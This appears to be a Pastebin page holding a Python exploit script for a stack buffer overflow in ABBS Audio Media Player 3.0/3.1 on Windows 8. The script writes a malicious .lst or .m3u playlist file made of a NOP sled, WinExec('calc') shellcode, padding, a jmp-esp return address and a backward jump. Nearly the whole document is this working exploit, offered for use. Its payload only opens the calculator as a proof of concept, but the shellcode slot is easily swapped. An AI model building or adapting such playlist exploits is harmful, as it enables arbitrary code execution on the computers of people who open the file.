Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # ABBS Audio Media Player (3.0/3.1) Buffer Overflow exploit (M3U/LST)
- # Win8
- # Rh0
- print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0/3.1[*]"
- bufferlen = 4108; # buffer until return address overwrite
- nops = "\x90" * 5;
- ## WinExec("calc",1)
- shellcode = (
- "\x33\xC0" # xor eax,eax
- "\x50" # push eax
- "\x68\x63\x61\x6C\x63" # push 'calc'
- "\x8B\xDC" # mov ebx, esp
- "\xB0\x01" # mov al, 1
- "\x50" # push eax
- "\x53" # push ebx
- "\xB8\x86\x30\x82\x74" # mov eax, 0x74823086 ### This maybe must be adjusted (contains &(Winexec@kernel32 - 1 )
- "\x04\x01" # add al, 1
- "\xFF\xD0" # call eax (WinExec@kernel32.dll = 0x74823087)
- )
- ret = "\x54\xad\x42\x76"; # jmp esp @user32.dll (0x7642ad54) This maybe must be adjusted. Enter address which points to "jmp esp"
- esp = "\xe9\xeb\xef\xff\xff"; # jmp backwards 4116 bytes
- buffer = nops
- buffer += shellcode
- buffer += "A" * (bufferlen - len(buffer))
- buffer += ret;
- buffer += esp;
- try:
- A = open("exploit.lst","wb") # exploit works also with .m3u
- A.write(buffer)
- A.close()
- print "[*] exploit.lst created [*]"
- except:
- print "[*] Error while creating file [*]"
- print "[*] Enter to continue.. [*]"
- raw_input()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement